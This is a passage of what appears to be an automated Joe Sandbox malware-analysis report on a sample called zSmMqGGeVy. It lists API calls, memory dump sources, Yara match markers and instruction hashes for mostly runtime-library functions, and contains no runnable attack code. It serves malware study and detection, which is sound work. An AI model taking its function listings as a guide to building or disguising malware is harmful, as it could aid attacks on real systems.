                                                  • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00E91B6C
                                                  • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00E91B8B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileInternet$PointerRead
                                                  • String ID:
                                                  • API String ID: 3197321146-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                  • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                                  • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                  • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                                  APIs
                                                    • Part of subcall function 0040FC08: _free.LIBCMT ref: 0040FC16
                                                    • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0041384C,?,00000000,00000000), ref: 00413599
                                                  • GetLastError.KERNEL32 ref: 00415AB1
                                                  • __dosmaperr.LIBCMT ref: 00415AB8
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00415AF7
                                                  • __dosmaperr.LIBCMT ref: 00415AFE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                  • String ID:
                                                  • API String ID: 167067550-0
                                                  • Opcode ID: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                                  • Instruction ID: 3f7c4113f524ad2c0abd5e3f91609bb3d7c3a41f61a1f3e5b12bbd4c913db815
                                                  • Opcode Fuzzy Hash: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                                  • Instruction Fuzzy Hash: 5221D871604615EFDB20AF66DCC19EBB76CEF443A8710862BF82497291D73CED8187A4
                                                  APIs
                                                    • Part of subcall function 00E9FE6F: _free.LIBCMT ref: 00E9FE7D
                                                    • Part of subcall function 00EA375E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00EA88CA,?,?,?,00000000,?,00EA8639,0000FDE9,00000000,?), ref: 00EA3800
                                                  • GetLastError.KERNEL32 ref: 00EA5D18
                                                  • __dosmaperr.LIBCMT ref: 00EA5D1F
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00EA5D5E
                                                  • __dosmaperr.LIBCMT ref: 00EA5D65
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                  • String ID:
                                                  • API String ID: 167067550-0
                                                  • Opcode ID: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                                  • Instruction ID: ab345edf4f16e5e7c443bb143d41b0752ba85c07b7f8a003ca3d8cd3b20f8873
                                                  • Opcode Fuzzy Hash: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                                  • Instruction Fuzzy Hash: 6421C5B2600A05BFDB20AF658C8496BB7ECEF0A3687119518F91ABF150E731FD4087A0
                                                  APIs
                                                    • Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE
                                                    • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                                  • GetLastError.KERNEL32 ref: 10007C36
                                                  • __dosmaperr.LIBCMT ref: 10007C3D
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                                  • __dosmaperr.LIBCMT ref: 10007C83
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                  • String ID:
                                                  • API String ID: 167067550-0
                                                  • Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                  • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                                  • Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                  • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                  • Instruction ID: 01c073d8d79eab8830238d6483e03b3ebb8acd186465fca52440242d5d830f33
                                                  • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                  • Instruction Fuzzy Hash: 0821DD71E01321BBCB318B249C85B9A7768AF5B7A4F2595A1FD16BF290D630FC00C6E4
                                                  APIs
                                                  • GetLastError.KERNEL32(00401ED8,?,00401EDC,0040C3A9,?,00401ED8,771ADF80,?,004114AD,00000000,771ADF80,00000000,00000000,00401ED8), ref: 00411202
                                                  • _free.LIBCMT ref: 0041125F
                                                  • _free.LIBCMT ref: 00411295
                                                  • SetLastError.KERNEL32(00000000,00000008,000000FF,?,004114AD,00000000,771ADF80,00000000,00000000,00401ED8), ref: 004112A0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                                  • Instruction ID: cded345c8d5c530dafeb31fb37215a8dc2974a232bbf80fd36b18c5a372c037c
                                                  • Opcode Fuzzy Hash: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                                  • Instruction Fuzzy Hash: 8011A7327005002A965127B57C86EFB26698BC57B8B64037BFB15E22F1EA3D8C92411D
                                                  APIs
                                                  • GetLastError.KERNEL32(00E9213F,?,00E92143,00E9C610,?,00E9213F,0041D0A0,?,00EA1714,00000000,0041D0A0,00000000,00000000,00E9213F), ref: 00EA1469
                                                  • _free.LIBCMT ref: 00EA14C6
                                                  • _free.LIBCMT ref: 00EA14FC
                                                  • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,00EA1714,00000000,0041D0A0,00000000,00000000,00E9213F), ref: 00EA1507
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                                  • Instruction ID: 68eef3ed78905440353f6f750ead508f8ec4e3945b021a18227b055a80c5a54e
                                                  • Opcode Fuzzy Hash: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                                  • Instruction Fuzzy Hash: FE11E9367001042FD62127BC5C86D7A2ADA8BCF379F6532B8F634BE1E1DF25AC115115
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
                                                  • _free.LIBCMT ref: 10006EFE
                                                  • _free.LIBCMT ref: 10006F34
                                                  • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                  • Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
                                                  • Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                  • Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,0040C33E,004124E1,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?), ref: 00411359
                                                  • _free.LIBCMT ref: 004113B6
                                                  • _free.LIBCMT ref: 004113EC
                                                  • SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004113F7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                                  • Instruction ID: 755f6b258ceaa8e65099160f8bc9def63f750f9b951ab46e134be7d7a93c0062
                                                  • Opcode Fuzzy Hash: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                                  • Instruction Fuzzy Hash: AD11CA317005042BA611277A6C82EEB16598BC13B8B64033BFF24821F1EA2D8C92411D
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,00E9C5A5,00EA2748,?,?,00E9A3C2,?,?,?,00E91353,?,00E9370E,?,?), ref: 00EA15C0
                                                  • _free.LIBCMT ref: 00EA161D
                                                  • _free.LIBCMT ref: 00EA1653
                                                  • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,00E9A3C2,?,?,?,00E91353,?,00E9370E,?,?,?), ref: 00EA165E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                                  • Instruction ID: 03fc7f97e1590df41708fc5d9f62a4c6397b930e31748a831468c092e832dfe9
                                                  • Opcode Fuzzy Hash: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                                  • Instruction Fuzzy Hash: EF114C32B041002BD62222B96C86E3A269A8BCF378F6433B4F524FE1E1DF61AC115115
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
                                                  • _free.LIBCMT ref: 10007055
                                                  • _free.LIBCMT ref: 1000708B
                                                  • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                  • Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
                                                  • Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                  • Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631
                                                  APIs
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00E9C13F,?,?,0042B000,00000000,?,00E9C26A,00000004,0041EAFC,0041EAF4,0041EAFC,00000000), ref: 00E9C10E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                  • Instruction ID: d27cce08484774a2471a312ad52881d65d23ddc4b991de5b7fa41a9d435448aa
                                                  • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                  • Instruction Fuzzy Hash: D5110271E41221EBCF32AB699C44B9E37A4AF067A4F314220FD15FB280D770ED4086E8
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000), ref: 0041AE39
                                                  • GetLastError.KERNEL32(?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000,?,004185FC,00000000), ref: 0041AE45
                                                    • Part of subcall function 0041AE0B: CloseHandle.KERNEL32(FFFFFFFE,0041AE55,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000), ref: 0041AE1B
                                                  • ___initconout.LIBCMT ref: 0041AE55
                                                    • Part of subcall function 0041ADCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041ADFC,0041AABC,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041ADE0
                                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041AE6A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                  • Instruction ID: ee4a97f4c5e0560d025622a6e285d837d398bf1ce1ecb10de8e4d9e98fca97b7
                                                  • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                  • Instruction Fuzzy Hash: 26F0F836942214BBCF222F929C049CA3F26EF087A5F054025FA0985130C63689B19B9A
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00EAAD36,00000000,00000001,00000000,00000000,?,00EA830F,00000000,00000000,00000000), ref: 00EAB0A0
                                                  • GetLastError.KERNEL32(?,00EAAD36,00000000,00000001,00000000,00000000,?,00EA830F,00000000,00000000,00000000,00000000,00000000,?,00EA8863,?), ref: 00EAB0AC
                                                    • Part of subcall function 00EAB072: CloseHandle.KERNEL32(0042A930,00EAB0BC,?,00EAAD36,00000000,00000001,00000000,00000000,?,00EA830F,00000000,00000000,00000000,00000000,00000000), ref: 00EAB082
                                                  • ___initconout.LIBCMT ref: 00EAB0BC
                                                    • Part of subcall function 00EAB034: CreateFileW.KERNEL32(004265E8,40000000,00000003,00000000,00000003,00000000,00000000,00EAB063,00EAAD23,00000000,?,00EA830F,00000000,00000000,00000000,00000000), ref: 00EAB047
                                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00EAAD36,00000000,00000001,00000000,00000000,?,00EA830F,00000000,00000000,00000000,00000000), ref: 00EAB0D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                  • Instruction ID: ddab785fa5a1b629b46ce885fa83c425c72e72e18a0fddbadd3975bec7588fd5
                                                  • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                  • Instruction Fuzzy Hash: B3F01C36911114FBCF222F91DC0899A7F66EF0D7A4F054420FA19AA131D7329961DB95
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                                  • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                                    • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                                  • ___initconout.LIBCMT ref: 1000CD55
                                                    • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                  • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                                  • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                  • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                                  APIs
                                                  • SleepConditionVariableCS.KERNELBASE(?,00409195,00000064), ref: 0040921B
                                                  • RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409225
                                                  • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409195,00000064,?,?,?,0040104A,0042BB40), ref: 00409236
                                                  • RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040923D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                  • String ID:
                                                  • API String ID: 3269011525-0
                                                  • Opcode ID: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                                  • Instruction ID: 40c2fce60939aafa0776eae2e2369d18d4b8ec69fabe1ce25dfd7c9304a85116
                                                  • Opcode Fuzzy Hash: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                                  • Instruction Fuzzy Hash: 67E092B1B40234BBCB112B90FE08ACD7F24EB0CB51B458072FD0666161C77D09228BDE
                                                  APIs
                                                  • _free.LIBCMT ref: 00410A4F
                                                    • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                    • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                  • _free.LIBCMT ref: 00410A62
                                                  • _free.LIBCMT ref: 00410A73
                                                  • _free.LIBCMT ref: 00410A84
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                                  • Instruction ID: 4f604ca58aada12d27b251242fa97a7c83cac521b99ee6611507b97af23f288b
                                                  • Opcode Fuzzy Hash: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                                  • Instruction Fuzzy Hash: 46E0EC71B13360AA8632AF15BD41589FFA1EFD4B543C9003BF50812631D73909939BCE
                                                  APIs
                                                  • _free.LIBCMT ref: 00EA0CB6
                                                    • Part of subcall function 00EA1D29: HeapFree.KERNEL32(00000000,00000000,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?), ref: 00EA1D3F
                                                    • Part of subcall function 00EA1D29: GetLastError.KERNEL32(?,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?,?), ref: 00EA1D51
                                                  • _free.LIBCMT ref: 00EA0CC9
                                                  • _free.LIBCMT ref: 00EA0CDA
                                                  • _free.LIBCMT ref: 00EA0CEB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                  • Instruction ID: 60218b3685060683145af14b4f0830ae04012e8d7c5a9f99af151c2e3982c399
                                                  • Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                  • Instruction Fuzzy Hash: DBE0EC79A133349A86366F14BD41449FFAAEBDDB117862076F4202A231C73225539BCF
                                                  APIs
                                                  • _free.LIBCMT ref: 100067F1
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 10006804
                                                  • _free.LIBCMT ref: 10006815
                                                  • _free.LIBCMT ref: 10006826
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
